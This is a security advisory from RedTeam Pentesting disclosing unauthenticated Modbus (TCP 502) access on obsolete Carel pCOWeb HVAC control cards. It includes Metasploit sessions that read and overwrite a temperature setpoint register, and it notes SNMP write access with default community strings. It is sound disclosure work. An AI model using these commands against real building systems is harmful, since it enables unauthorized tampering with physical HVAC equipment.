Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC
As part of its features, the Carel pCOWeb card exposes a Modbus interface to the network. By design, Modbus does not provide authentication, allowing to control the affected system.
Details
- Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
- Affected Versions: “A 1.4.11 - B 1.4.2”, possibly others
- Fixed Versions: product obsolete
- Vulnerability Type: Unauthenticated Access
- Security Risk: high
- Vendor URL:
https://www.carel.com/product/pcoweb-card
- Vendor Status: notified / product obsolete
- Advisory URL:
https://www.redteam-pentesting.de/advisories/rt-sa-2019-014
- Advisory Status: published
- CVE: GENERIC-MAP-NOMATCH
- CVE URL:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
“The pCOWeb card is used to interface the pCO Sistema to networks that use the HVAC protocols based on the Ethernet physical standard, such as BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated Web-Server, which both contains the HTML pages relating to the specific application and allows a browser to be used for remote system management.” (from the vendor’s homepage)
It is used as an OEM module in several different HVAC systems and considered obsolete by the vendor.
More Details
While authentication is required to access the web interface (compare advisory rt-sa-2019-013 (https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-013.txt)) no authentication is necessary for using the Modbus interface on TCP port 502, since the Modbus protocol did not offer any authentication mechanism during the device’s lifetime. The addition of encryption and authentication was only recently proposed by the Modbus Organization (http://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf).
It is believed that this might be analogous to the problem described in CVE-2019-13549 for the special case of Rittal SK 3232 products. Other OEMs are affected, too.
Proof of Concept
The web interface of the Carel pCOWeb card allows authenticated users to read and write many variables of the system via the URL
http://192.168.0.1/config/adminpage.html
This web page seems to provide access to all Modbus variables using large tables of variables 1-207 for digital, analog and integer variables, respectively.
By accessing TCP port 502 (Modbus to TCP), it is possible to access these variables without authentication. This can be done, for example, by using the Metasploit (https://www.metasploit.com/) modbusclient (https://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient) module:
msf5 > use auxiliary/scanner/scada/modbusclient
msf5 auxiliary(scanner/scada/modbusclient) > set RHOSTS 192.168.0.1
RHOSTS => 192.168.0.1
msf5 auxiliary(scanner/scada/modbusclient) > set DATA_ADDRESS 10
DATA_ADDRESS => 10
msf5 auxiliary(scanner/scada/modbusclient) > run
[*] 192.168.0.1:502 - Sending READ REGISTERS...
[+] 192.168.0.1:502 - 1 register values from address 10 :
[+] 192.168.0.1:502 - [240]
[*] Auxiliary module execution completed
The returned value matches the set temperature of 24°C multiplied by ten, as the variable can only hold integers. Using the same module, it is possible to change the temperature setpoint, too:
msf5 auxiliary(scanner/scada/modbusclient) > set ACTION WRITE_REGISTER
ACTION => WRITE_REGISTER
msf5 auxiliary(scanner/scada/modbusclient) > set DATA 241
DATA => 241
msf5 auxiliary(scanner/scada/modbusclient) > run
[*] 192.168.0.1:502 - Sending WRITE REGISTER...
[+] 192.168.0.1:502 - Value 241 successfully written at registry address 10
[*] Auxiliary module execution completed
This allows unauthenticated remote attackers to reconfigure the device.
Depending on OEM integration, different variables might represent different settings.
Additionally, the system provides SNMP (UDP Port 161) write access with the SNMP community string “public” or “carel” (depending on version) as documented in the manual (https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0) and BACnet over IP (UDP Port 47808).
Workaround
The Carel pCOWeb card should not be connected to networks accessible by untrusted users.
Fix
No updated firmware will be published for pCOWeb Cards, as they are obsolete since Dec 2017. A successor hardware with current firmware is available for OEM integrators.
Security Risk
Since the Modbus protocol implemented in the Carel pCOWeb card does not offer authentication, it is not possible to limit access to the system to authorised users, allowing attackers to control the system if the device is accessible via the network. This is considered to pose a high risk in context of the Carel pCOWeb card.
Timeline
- 2019-07-17 Vulnerability identified
- 2019-08-03 Customer approved disclosure to vendor
- 2019-09-02 Vendor notified
- 2019-09-09 Vendor did not respond as promised
- 2019-09-17 Vendor could not be reached
- 2019-09-18 Vendor could not be reached
- 2019-10-28 Advisory published due to publication of CVE-2019-13549
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/